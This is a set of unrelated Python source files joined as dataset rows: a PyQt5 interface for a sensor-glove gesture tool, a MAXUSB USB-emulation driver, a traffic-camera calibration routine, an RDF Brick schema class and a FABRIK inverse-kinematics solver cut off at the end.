self.quatYLabel.setObjectName("quatYLabel")
self.formLayout_3.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.quatYLabel)
self.quatYLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatYLineEdit.setFont(font)
self.quatYLineEdit.setReadOnly(True)
self.quatYLineEdit.setObjectName("quatYLineEdit")
self.formLayout_3.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.quatYLineEdit)
self.quatZLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatZLabel.setObjectName("quatZLabel")
self.formLayout_3.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.quatZLabel)
self.quatZLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatZLineEdit.setFont(font)
self.quatZLineEdit.setReadOnly(True)
self.quatZLineEdit.setObjectName("quatZLineEdit")
self.formLayout_3.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.quatZLineEdit)
self.verticalLayout_quat_euler.addWidget(self.gBoxQuat)
self.gBoxEuler = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxEuler.setObjectName("gBoxEuler")
self.formLayout_5 = QtWidgets.QFormLayout(self.gBoxEuler)
self.formLayout_5.setObjectName("formLayout_5")
self.rollLabel = QtWidgets.QLabel(self.gBoxEuler)
self.rollLabel.setObjectName("rollLabel")
self.formLayout_5.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.rollLabel)
self.rollLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.rollLineEdit.setMaxLength(5)
self.rollLineEdit.setObjectName("rollLineEdit")
self.formLayout_5.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.rollLineEdit)
self.pitchLabel = QtWidgets.QLabel(self.gBoxEuler)
self.pitchLabel.setObjectName("pitchLabel")
self.formLayout_5.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.pitchLabel)
self.pitchLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.pitchLineEdit.setMaxLength(5)
self.pitchLineEdit.setObjectName("pitchLineEdit")
self.formLayout_5.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.pitchLineEdit)
self.yawLabel = QtWidgets.QLabel(self.gBoxEuler)
self.yawLabel.setObjectName("yawLabel")
self.formLayout_5.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.yawLabel)
self.yawLineEdit = QtWidgets.QLineEdit(self.gBoxEuler)
self.yawLineEdit.setMaxLength(5)
self.yawLineEdit.setObjectName("yawLineEdit")
self.formLayout_5.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.yawLineEdit)
self.verticalLayout_quat_euler.addWidget(self.gBoxEuler)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_quat_euler)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gBoxAccel = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxAccel.setObjectName("gBoxAccel")
self.formLayout_4 = QtWidgets.QFormLayout(self.gBoxAccel)
self.formLayout_4.setObjectName("formLayout_4")
self.accelXLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelXLabel.setObjectName("accelXLabel")
self.formLayout_4.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.accelXLabel)
self.accelXLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelXLineEdit.setFont(font)
self.accelXLineEdit.setReadOnly(True)
self.accelXLineEdit.setObjectName("accelXLineEdit")
self.formLayout_4.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.accelXLineEdit)
self.accelYLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelYLabel.setObjectName("accelYLabel")
self.formLayout_4.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.accelYLabel)
self.accelYLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelYLineEdit.setFont(font)
self.accelYLineEdit.setReadOnly(True)
self.accelYLineEdit.setObjectName("accelYLineEdit")
self.formLayout_4.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.accelYLineEdit)
self.accelZLabel = QtWidgets.QLabel(self.gBoxAccel)
self.accelZLabel.setObjectName("accelZLabel")
self.formLayout_4.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.accelZLabel)
self.accelZLineEdit = QtWidgets.QLineEdit(self.gBoxAccel)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.accelZLineEdit.setFont(font)
self.accelZLineEdit.setReadOnly(True)
self.accelZLineEdit.setObjectName("accelZLineEdit")
self.formLayout_4.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.accelZLineEdit)
self.verticalLayout_2.addWidget(self.gBoxAccel)
self.gBoxOrientation = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxOrientation.setObjectName("gBoxOrientation")
self.formLayout_6 = QtWidgets.QFormLayout(self.gBoxOrientation)
self.formLayout_6.setObjectName("formLayout_6")
self.directionLabel = QtWidgets.QLabel(self.gBoxOrientation)
self.directionLabel.setObjectName("directionLabel")
self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.directionLabel)
self.directionLineEdit = QtWidgets.QLineEdit(self.gBoxOrientation)
self.directionLineEdit.setObjectName("directionLineEdit")
self.formLayout_6.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.directionLineEdit)
self.verticalLayout_2.addWidget(self.gBoxOrientation)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_2)
self.verticalLayout_adds = QtWidgets.QVBoxLayout()
self.verticalLayout_adds.setObjectName("verticalLayout_adds")
self.gBoxSerialParse = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxSerialParse.setObjectName("gBoxSerialParse")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.gBoxSerialParse)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnSerialParseStop = QtWidgets.QPushButton(self.gBoxSerialParse)
self.btnSerialParseStop.setObjectName("btnSerialParseStop")
self.horizontalLayout.addWidget(self.btnSerialParseStop)
self.btnSerialParseStart = QtWidgets.QPushButton(self.gBoxSerialParse)
self.btnSerialParseStart.setObjectName("btnSerialParseStart")
self.horizontalLayout.addWidget(self.btnSerialParseStart)
self.verticalLayout_adds.addWidget(self.gBoxSerialParse)
self.gBoxHandAnimate = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxHandAnimate.setObjectName("gBoxHandAnimate")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.gBoxHandAnimate)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.btnHandAnimateStop = QtWidgets.QPushButton(self.gBoxHandAnimate)
self.btnHandAnimateStop.setObjectName("btnHandAnimateStop")
self.horizontalLayout_3.addWidget(self.btnHandAnimateStop)
self.btnHandAnimateStart = QtWidgets.QPushButton(self.gBoxHandAnimate)
self.btnHandAnimateStart.setObjectName("btnHandAnimateStart")
self.horizontalLayout_3.addWidget(self.btnHandAnimateStart)
self.verticalLayout_adds.addWidget(self.gBoxHandAnimate)
self.gBoxPlotSignals = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxPlotSignals.setObjectName("gBoxPlotSignals")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.gBoxPlotSignals)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnPlotSignalsStop = QtWidgets.QPushButton(self.gBoxPlotSignals)
self.btnPlotSignalsStop.setObjectName("btnPlotSignalsStop")
self.horizontalLayout_2.addWidget(self.btnPlotSignalsStop)
self.btnPlotSignalsStart = QtWidgets.QPushButton(self.gBoxPlotSignals)
self.btnPlotSignalsStart.setObjectName("btnPlotSignalsStart")
self.horizontalLayout_2.addWidget(self.btnPlotSignalsStart)
self.verticalLayout_adds.addWidget(self.gBoxPlotSignals)
self.checkBoxDataOutAvg = QtWidgets.QCheckBox(self.centralwidget)
self.checkBoxDataOutAvg.setObjectName("checkBoxDataOutAvg")
self.verticalLayout_adds.addWidget(self.checkBoxDataOutAvg)
self.horizontalLayout_dataOut.addLayout(self.verticalLayout_adds)
self.verticalLayout.addLayout(self.horizontalLayout_dataOut)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1280, 38))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "HandsOn Developer"))
self.labelFile.setText(_translate("MainWindow", "Output File:"))
self.btnFileOut.setText(_translate("MainWindow", "Load/Create File"))
self.labelOutFileViewer.setText(_translate("MainWindow", "Output File Viewer:"))
self.labelGestCap.setText(_translate("MainWindow", "Gesture Identifier:"))
self.btnGestCap.setText(_translate("MainWindow", "Capture Gesture"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.captureTab), _translate("MainWindow", "Capture Gesture"))
self.labelTrainFile.setText(_translate("MainWindow", "Training File:"))
self.btnTrainFile.setText(_translate("MainWindow", "Load File"))
self.labelTrainFileViewer.setText(_translate("MainWindow", "Training File Viewer:"))
self.labelTrainStatus.setText(_translate("MainWindow", "Classifier Status:"))
self.lineEditTrainStatus.setPlaceholderText(_translate("MainWindow", "Not Ready"))
self.btnTrainClassifier.setText(_translate("MainWindow", "Train Classifier"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.trainTab), _translate("MainWindow", "Train Classifier"))
self.checkBoxTtoS.setText(_translate("MainWindow", "Enable Text-to-Speech"))
self.checkBoxClassRTdebug.setText(_translate("MainWindow", "Enable Debug Output"))
self.labelClassRtDelay.setText(_translate("MainWindow", "Set Delay (s):"))
self.lineEditClassRtDelay.setPlaceholderText(_translate("MainWindow", "0.5"))
self.labelClassRT.setText(_translate("MainWindow", "Real Time Classification:"))
self.btnClassifyStop.setText(_translate("MainWindow", "Stop"))
self.btnClassifyStart.setText(_translate("MainWindow", "Start"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.classifyRealTab), _translate("MainWindow", "Classify Real Time"))
self.gBoxFlex.setTitle(_translate("MainWindow", "Flex Sensors"))
self.indexLabel.setText(_translate("MainWindow", "Index"))
self.indexKnuckleLabel.setText(_translate("MainWindow", "IndexKnuckle"))
self.middleLabel.setText(_translate("MainWindow", "Middle"))
self.middleKnuckleLabel.setText(_translate("MainWindow", "MiddleKnuckle"))
self.ringLabel.setText(_translate("MainWindow", "Ring"))
self.ringKnuckleLabel.setText(_translate("MainWindow", "RingKnuckle"))
self.pinkyLabel.setText(_translate("MainWindow", "Pinky"))
self.thumbLabel.setText(_translate("MainWindow", "Thumb"))
self.thumbKnuckeLabel.setText(_translate("MainWindow", "ThumbKnucke"))
self.gBoxTouch.setTitle(_translate("MainWindow", "Touch Capactive Sensors"))
self.indexSideLabel.setText(_translate("MainWindow", "IndexSide"))
self.indexTopLabel.setText(_translate("MainWindow", "IndexTop"))
self.middleTopLabel.setText(_translate("MainWindow", "MiddleTop"))
self.middleSideLabel.setText(_translate("MainWindow", "MiddleSide"))
self.ringSideLabel.setText(_translate("MainWindow", "RingSide"))
self.pinkySideLabel.setText(_translate("MainWindow", "PinkySide"))
self.pinkyTopLabel.setText(_translate("MainWindow", "PinkyTop"))
self.gBoxQuat.setTitle(_translate("MainWindow", "Quaternions"))
self.quatWLabel.setText(_translate("MainWindow", "quatW"))
self.quatXLabel.setText(_translate("MainWindow", "quatX"))
self.quatYLabel.setText(_translate("MainWindow", "quatY"))
self.quatZLabel.setText(_translate("MainWindow", "quatZ"))
self.gBoxEuler.setTitle(_translate("MainWindow", "Euler Angles"))
self.rollLabel.setText(_translate("MainWindow", "Roll:"))
self.pitchLabel.setText(_translate("MainWindow", "Pitch"))
self.yawLabel.setText(_translate("MainWindow", "Yaw"))
self.gBoxAccel.setTitle(_translate("MainWindow", "Linear Acceleration"))
self.accelXLabel.setText(_translate("MainWindow", "accelX"))
self.accelYLabel.setText(_translate("MainWindow", "accelY"))
self.accelZLabel.setText(_translate("MainWindow", "accelZ"))
self.gBoxOrientation.setTitle(_translate("MainWindow", "Orientation"))
self.directionLabel.setText(_translate("MainWindow", "Direction"))
self.gBoxSerialParse.setTitle(_translate("MainWindow", "Serial Parser"))
self.btnSerialParseStop.setText(_translate("MainWindow", "Stop"))
self.btnSerialParseStart.setText(_translate("MainWindow", "Start"))
self.gBoxHandAnimate.setTitle(_translate("MainWindow", "Hand Animation"))
self.btnHandAnimateStop.setText(_translate("MainWindow", "Stop"))
self.btnHandAnimateStart.setText(_translate("MainWindow", "Start"))
self.gBoxPlotSignals.setTitle(_translate("MainWindow", "Plot Signals"))
self.btnPlotSignalsStop.setText(_translate("MainWindow", "Stop"))
self.btnPlotSignalsStart.setText(_translate("MainWindow", "Start"))
self.checkBoxDataOutAvg.setText(_translate("MainWindow", "Display moving window average"))
|
991,276 | 65626faf1afb754839d03bc3cf46f3da53d27f5a | from random import randint
class Ghost(object):
def __init__(self):
colors = ['white', 'yellow', 'purple', 'red']
self.color = colors[randint(0,len(colors)-1)]
c1 = Ghost()
print(c1.color) |
991,277 | 0b05c617a3e4cfeff2e235930ff8b2d349e21d5d | # MAXUSBApp.py
#
# Contains class definition for MAXUSBApp.
import time
from ..core import FacedancerApp
from ..USB import *
from ..USBDevice import USBDeviceRequest
class MAXUSBApp(FacedancerApp):
reg_ep0_fifo = 0x00
reg_ep1_out_fifo = 0x01
reg_ep2_in_fifo = 0x02
reg_ep3_in_fifo = 0x03
reg_setup_data_fifo = 0x04
reg_ep0_byte_count = 0x05
reg_ep1_out_byte_count = 0x06
reg_ep2_in_byte_count = 0x07
reg_ep3_in_byte_count = 0x08
reg_ep_stalls = 0x09
reg_clr_togs = 0x0a
reg_endpoint_irq = 0x0b
reg_endpoint_interrupt_enable = 0x0c
reg_usb_irq = 0x0d
reg_usb_interrupt_enable = 0x0e
reg_usb_control = 0x0f
reg_cpu_control = 0x10
reg_pin_control = 0x11
reg_revision = 0x12
reg_function_address = 0x13
reg_io_pins = 0x14
# bitmask values for reg_endpoint_irq = 0x0b
is_setup_data_avail = 0x20 # SUDAVIRQ
is_in3_buffer_avail = 0x10 # IN3BAVIRQ
is_in2_buffer_avail = 0x08 # IN2BAVIRQ
is_out1_data_avail = 0x04 # OUT1DAVIRQ
is_out0_data_avail = 0x02 # OUT0DAVIRQ
is_in0_buffer_avail = 0x01 # IN0BAVIRQ
# bitmask values for reg_usb_control = 0x0f
usb_control_vbgate = 0x40
usb_control_connect = 0x08
# bitmask values for reg_pin_control = 0x11
interrupt_level = 0x08
full_duplex = 0x10
ep0_in_nak = (1 << 5)
ep2_in_nak = (1 << 6)
ep3_in_nak = (1 << 7)
# TODO: Support a generic MaxUSB interface that doesn't
# depend on any GoodFET details.
@staticmethod
def bytes_as_hex(b, delim=" "):
return delim.join(["%02x" % x for x in b])
# HACK: but given the limitations of the MAX chips, it seems necessary
def send_on_endpoint(self, ep_num, data, blocking=False):
if ep_num == 0:
fifo_reg = self.reg_ep0_fifo
bc_reg = self.reg_ep0_byte_count
elif ep_num == 2:
fifo_reg = self.reg_ep2_in_fifo
bc_reg = self.reg_ep2_in_byte_count
elif ep_num == 3:
fifo_reg = self.reg_ep3_in_fifo
bc_reg = self.reg_ep3_in_byte_count
else:
raise ValueError('endpoint ' + str(ep_num) + ' not supported')
# FIFO buffer is only 64 bytes, must loop
while len(data) > 64:
self.write_bytes(fifo_reg, data[:64])
self.write_register(bc_reg, 64, ack=True)
data = data[64:]
self.write_bytes(fifo_reg, data)
self.write_register(bc_reg, len(data), ack=True)
if self.verbose > 1:
print(self.app_name, "wrote", self.bytes_as_hex(data), "to endpoint",
ep_num)
# HACK: but given the limitations of the MAX chips, it seems necessary
def read_from_endpoint(self, ep_num):
if ep_num != 1:
return b''
byte_count = self.read_register(self.reg_ep1_out_byte_count)
if byte_count == 0:
return b''
data = self.read_bytes(self.reg_ep1_out_fifo, byte_count)
if self.verbose > 1:
print(self.app_name, "read", self.bytes_as_hex(data), "from endpoint",
ep_num)
return data
def stall_endpoint(self, ep_number, direction=0):
"""
Stalls an arbitrary endpoint.
ep_number: The endpoint number to be stalled
direction: 0 for out, 1 for in
"""
if self.verbose > 0:
print(self.app_name, "stalling endpoint {}".format(ep_number))
# TODO: Verify our behavior, here. The original facedancer code stalls
# EP0 both _in_ and out, as well as uses the special STALL SETUP bit.
# Is this really what we want?
if ep_number == 0:
self.write_register(self.reg_ep_stalls, 0x23)
elif ep_number < 4:
self.write_writer(self.reg_ep_stalls, 1 << (ep_num + 1))
else:
raise ValueError("Invalid endpoint for MAXUSB device!")
def stall_ep0(self):
return self.stall_endpoint(0)
def get_version(self):
return self.read_register(self.reg_revision)
def connect(self, usb_device, max_ep0_packet_size=64):
if self.read_register(self.reg_usb_control) & self.usb_control_connect:
self.write_register(self.reg_usb_control, self.usb_control_vbgate)
time.sleep(.1)
self.write_register(self.reg_usb_control, self.usb_control_vbgate |
self.usb_control_connect)
self.connected_device = usb_device
if self.verbose > 0:
print(self.app_name, "connected device", self.connected_device.name)
def disconnect(self):
self.write_register(self.reg_usb_control, self.usb_control_vbgate)
if self.verbose > 0:
print(self.app_name, "disconnected device", self.connected_device.name)
self.connected_device = None
def clear_irq_bit(self, reg, bit):
self.write_register(reg, bit)
def service_irqs(self):
irq = self.read_register(self.reg_endpoint_irq)
in_nak = self.read_register(self.reg_pin_control)
if self.verbose > 3:
print(self.app_name, "read endpoint irq: 0x%02x" % irq)
print(self.app_name, "read pin control: 0x%02x" % in_nak)
if self.verbose > 2:
if irq & ~ (self.is_in0_buffer_avail \
| self.is_in2_buffer_avail | self.is_in3_buffer_avail):
print(self.app_name, "notable irq: 0x%02x" % irq)
if irq & self.is_setup_data_avail:
self.clear_irq_bit(self.reg_endpoint_irq, self.is_setup_data_avail)
b = self.read_bytes(self.reg_setup_data_fifo, 8)
if (irq & self.is_out0_data_avail) and (b[0] & 0x80 == 0x00):
data_bytes_len = b[6] + (b[7] << 8)
b += self.read_bytes(self.reg_ep0_fifo, data_bytes_len)
req = self.connected_device.create_request(b)
self.connected_device.handle_request(req)
if irq & self.is_out1_data_avail:
data = self.read_from_endpoint(1)
if data:
self.connected_device.handle_data_available(1, data)
self.clear_irq_bit(self.reg_endpoint_irq, self.is_out1_data_avail)
if irq & self.is_in2_buffer_avail:
self.connected_device.handle_buffer_available(2)
if irq & self.is_in3_buffer_avail:
self.connected_device.handle_buffer_available(3)
# Check to see if we've NAK'd on either of our IN endpoints,
# and generate the relevant events.
if in_nak & self.ep2_in_nak:
self.connected_device.handle_nak(2)
self.clear_irq_bit(self.reg_pin_control, in_nak | self.ep2_in_nak)
if in_nak & self.ep3_in_nak:
self.connected_device.handle_nak(3)
self.clear_irq_bit(self.reg_pin_control, in_nak | self.ep3_in_nak)
def set_address(self, address, defer=False):
"""
Sets the device address of the Facedancer. Usually only used during
initial configuration.
address: The address that the Facedancer should assume.
"""
# The MAXUSB chip handles this for us, so we don't need to do anything.
pass
def configured(self, configuration):
"""
Callback that's issued when a USBDevice is configured, e.g. by the
SET_CONFIGURATION request. Allows us to apply the new configuration.
configuration: The configuration applied by the SET_CONFIG request.
"""
# For the MAXUSB case, we don't need to do anything, though it might
# be nice to print a message or store the active configuration for
# use by the USBDevice, etc. etc.
pass
|
991,278 | 30fd23d3de4a569db9b1dfd4b1d89d6d44629e5a | from sympy import Line, Point, intersection
import numpy as np
import yaml
import os.path
from os.path import realpath, dirname
class ParameterCompute(object):
"""
Schoepflin, T.N., and D.J. Dailey. 2003.
“Dynamic Camera Calibration of Roadside Traffic Management Cameras for Vehicle Speed Estimation.”
IEEE Transactions on Intelligent Transportation Systems 4 (2): 90–98.
https://doi.org/10.1109/TITS.2003.821213.
"""
def __init__(self, extent_x, extent_y, one_point=True, **kwargs):
"""
[1]N. K. Kanhere and S. T. Birchfield,
“A Taxonomy and Analysis of Camera Calibration Methods for Traffic Monitoring Applications,”
IEEE Transactions on Intelligent Transportation Systems, vol. 11, no. 2, pp. 441–452, Jun. 2010.
upper left corner as origin point
road direction: p1, p2 | p3, p4
perpendicular direction: p1, p4 | p2, p3
width x value: u2, u3,
length y value: vb, vf
width: w
length: l
"""
self.shift_x = extent_x / 2
self.shift_y = extent_y / 2
self.one_point = one_point
self.p1 = kwargs['p1']
self.p2 = kwargs['p2']
self.p3 = kwargs['p3']
self.p4 = kwargs['p4']
self.u2 = kwargs['u2']
self.u3 = kwargs['u3']
self.p1 = (self.p1[0] - self.shift_x, self.p1[1] - self.shift_y)
self.p2 = (self.p2[0] - self.shift_x, self.p2[1] - self.shift_y)
self.p3 = (self.p3[0] - self.shift_x, self.p3[1] - self.shift_y)
self.p4 = (self.p4[0] - self.shift_x, self.p4[1] - self.shift_y)
self.u2 = self.u2 - self.shift_x
self.u3 = self.u3 - self.shift_x
self.w = kwargs['w']
if self.one_point:
self.vb = kwargs['vb']
self.vf = kwargs['vf']
self.vb = self.vb - self.shift_y
self.vf = self.vf - self.shift_y
self.l = kwargs['l']
self.u0, self.v0 = self.__compute_1st_vanishing_points()
if not self.one_point:
self.u1 = self.__compute_2nd_vanishing_points()
def __compute_1st_vanishing_points(self):
road_l1 = Line(Point(self.p1), Point(self.p2))
road_l2 = Line(Point(self.p3), Point(self.p4))
road_intersection = intersection(road_l1, road_l2)
u0 = float(road_intersection[0][0])
v0 = float(road_intersection[0][1])
return u0, v0
def __compute_2nd_vanishing_points(self):
# perp_l1 = Line(Point(self.p2), Point(self.p3))
perp_l1 = Line(Point(self.p1), Point(self.p4))
# horizon_l = Line(Point(0, self.v0), (1, self.v0))
horizon_l = Line(Point(self.p2), Point(self.p3))
perp_intersection = intersection(perp_l1, horizon_l)
u1 = float(perp_intersection[0][0])
return u1
def calibration(self, save=True):
delta = self.u3 - self.u2
if not self.one_point:
fs = [np.sqrt(-(self.v0**2 + self.u0 * self.u1))]
else:
k = (self.vf - self.v0) * (self.vb - self.v0) / (self.vf - self.vb)
k_v = delta * k * self.l / (self.w * self.v0)
B = 2 * (self.u0**2 + self.v0**2) - k_v**2
C = (self.u0**2 + self.v0**2)**2 - k_v**2 * self.v0**2
# print('delta', delta)
# print('k', k)
# print('k_v', k_v)
# print('u0', self.u0)
# print('v0', self.v0)
# print('B', B)
# print('C', C)
f_square_0 = (-B + np.sqrt(B**2 - 4 * C)) / 2
f_square_1 = (-B - np.sqrt(B**2 - 4 * C)) / 2
fs = [np.sqrt(f_square_0)]
if f_square_1 >= 0:
fs.append(np.sqrt(f_square_1))
phis = []
thetas = []
hs = []
for f in fs:
phi = np.arctan(-self.v0 / f)
theta = np.arctan(-self.u0 * np.cos(phi) / f)
h = f * self.w * np.sin(phi) / (np.abs(delta) * np.cos(theta))
phis.append(phi)
thetas.append(theta)
hs.append(h)
cc_parameter = {
"f" : [float(f) for f in fs],
"phi": [float(phi) for phi in phis],
"theta": [float(theta) for theta in thetas],
"h": [float(h) for h in hs],
}
if save:
with open(os.path.join(dirname(realpath(__file__)),"cc_parameter.yaml"), 'w') as f_cc_parameter:
f_cc_parameter.write(yaml.dump(cc_parameter))
return cc_parameter
|
991,279 | 15c4afb7835dfb0bf9dc467aad5a451a86d45543 | from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.AHU_Discharge_Air_Temperature_Cooling_Setpoint import AHU_Discharge_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint import Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.AHU_Supply_Air_Temperature_Cooling_Setpoint import AHU_Supply_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint import Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint
class AHU_Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint(AHU_Discharge_Air_Temperature_Cooling_Setpoint,Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint,AHU_Supply_Air_Temperature_Cooling_Setpoint,Cooling_Discharge_Air_Temperature_Proportional_Band_Setpoint):
rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').AHU_Cooling_Supply_Air_Temperature_Proportional_Band_Setpoint
|
991,280 | 6714e9ff514d251f7723971c6dca8cde95499ed6 | from fabrik_chain_3d import Bone as Bone, Joint as Joint, Mat as Mat, Utils as Util
import math
import numpy as np
class FABRIK():
def __init__(self, chain_length, target_position, target_orientation,is_base_bone_fixed,base_bone_constraint_uv,fixed_base_location):
self.target_position = target_position
self.target_orientation = target_orientation
self.chain_length = chain_length
self.bone_twist_limit = 2.8973 * 180 / math.pi
# This array store the rotations of ball or hinge joints
self.deg = [0] * chain_length
# This array store the rotations of a bone around its own; the last one belongs to the base bone which is fixed!
self.rotations = [0] * (chain_length+1)
self.fixed_base_location = fixed_base_location
self.fixed_base_location_2 = [0, 0, 0]
self.is_base_bone_fixed = is_base_bone_fixed
self.base_bone_constraint_uv = base_bone_constraint_uv
def solve_for_rotations(self, outer_joint_orientation, inner_joint_orientation, bone_number):
q1 = outer_joint_orientation
q2 = inner_joint_orientation
# finding the rotor that express rotation between two orientational frame(between outer and inner joint)
rotor = Util.Utils().find_rotation_quaternion(q1, q2)
if rotor[0] > 1:
rotor[0] = 0.99
if rotor[0] < -1:
rotor[0] = -0.99
needed_rotation = math.acos(rotor[0]) * 2 * (180 / np.pi)
self.rotations[bone_number] = needed_rotation * (np.pi / 180)
if needed_rotation <= self.bone_twist_limit:
# if the rotation is inside the limited
return Mat.Mat().multiply_two_quaternion(rotor, outer_joint_orientation)
else:
# the maximum allowed rotation angle
theta = (self.bone_twist_limit) * (np.pi / 180)
self.rotations[bone_number] = theta
# the rotation axis
if abs(rotor[0]) == 1:
return rotor
v1 = np.dot(rotor[1:], (1 / math.sqrt(1 - rotor[0] ** 2)))
w = math.cos(theta / 2)
x = v1[0] * math.sin(theta / 2)
y = v1[1] * math.sin(theta / 2)
z = v1[2] * math.sin(theta / 2)
return [w, x, y, z]
def forward(self,chain):
for loop in range(self.chain_length - 1, -1, -1):
# Get the length of the bone we're working on
this_bone = chain.get_bone(loop)
this_bone_length = this_bone.get_length()
this_bone_joint = this_bone.get_joint()
this_bone_joint_type = this_bone_joint.get_joint_type()
# If we are NOT working on the end effector bone
if loop != (self.chain_length - 1):
if this_bone.is_fix_bone() == 1:
this_bone_outer_to_inner_uv = Util.Utils().negated(this_bone.get_fixed_bone_direction_uv())
else:
# Get the outer-to-inner unit vector of the bone further out
outer_bone_outer_to_inner_uv = Util.Utils().negated(
chain.get_bone(loop+1).get_direction_uv())
# Get the outer-to-inner unit vector of this bone
this_bone_outer_to_inner_uv = Util.Utils().negated(
chain.get_bone(loop).get_direction_uv())
next_bone_orientation = chain.get_bone(loop+1).get_bone_orientation()
this_bone_orientation = chain.get_bone(loop+1).get_bone_orientation()
this_bone.set_bone_orientation(
self.solve_for_rotations(next_bone_orientation, this_bone_orientation, loop))
# Get the joint type for this bone and handle constraints on thisBoneOuterToInnerUV
if this_bone_joint_type == "BALL":
# Constrain to relative angle between this bone and the outer bone if required
angle_between_degs = Util.Utils().get_angle_between_degs(outer_bone_outer_to_inner_uv,
this_bone_outer_to_inner_uv)
constrain_angle_degs = this_bone_joint.get_ball_joint_constraint_degs()
if angle_between_degs > constrain_angle_degs:
this_bone_outer_to_inner_uv = Util.Utils().get_angle_limited_uv(this_bone_outer_to_inner_uv,
outer_bone_outer_to_inner_uv,
constrain_angle_degs)
elif this_bone_joint_type == "GLOBAL_HINGE":
# Project this bone outer-to-inner direction onto the hinge rotation axis
this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
this_bone_joint.get_hinge_rotation_axis())
elif this_bone_joint_type == "LOCAL_HINGE":
# Not a base bone? Then construct a rotation matrix based on the previous bones
# inner-to-outer direction...
if loop > 0:
m = Util.Utils().create_rotation_matrix(chain.get_bone(loop-1).get_direction_uv())
relative_hinge_rotation_axis = Util.Utils().normalization(
Util.Utils().times(m, this_bone_joint.get_hinge_rotation_axis()))
# transform the hinge rotation axis into the previous bones frame of reference.
# Project this bone's outer-to-inner direction onto the plane described by the relative hinge rotation axis
this_bone_outer_to_inner_uv = Util.Utils().project_on_to_plane(this_bone_outer_to_inner_uv,
relative_hinge_rotation_axis)
else:
raise Exception("The base bone joint can't be LOCAL HINGE")
scale = [i * this_bone_length for i in this_bone_outer_to_inner_uv]
end_location = this_bone.get_end_point_position()
new_start_location = [x + y for x, y in zip(end_location, scale)]
this_bone.set_start_point_position(new_start_location)
# If we are not working on the basebone, then we also set the end joint location of
# the previous bone in the chain
if loop > 0:
chain.get_bone(loop-1).set_end_point_position(new_start_location)
# If we ARE working on the end effector bone..
else:
# put end effector end location to the target
this_bone.set_end_point_position(self.target_position)
this_bone.set_bone_orientation(
self.solve_for_rotations(self.target_orientation, this_bone.get_bone_orientation(), loop))
if this_bone.is_fix_bone() == 1:
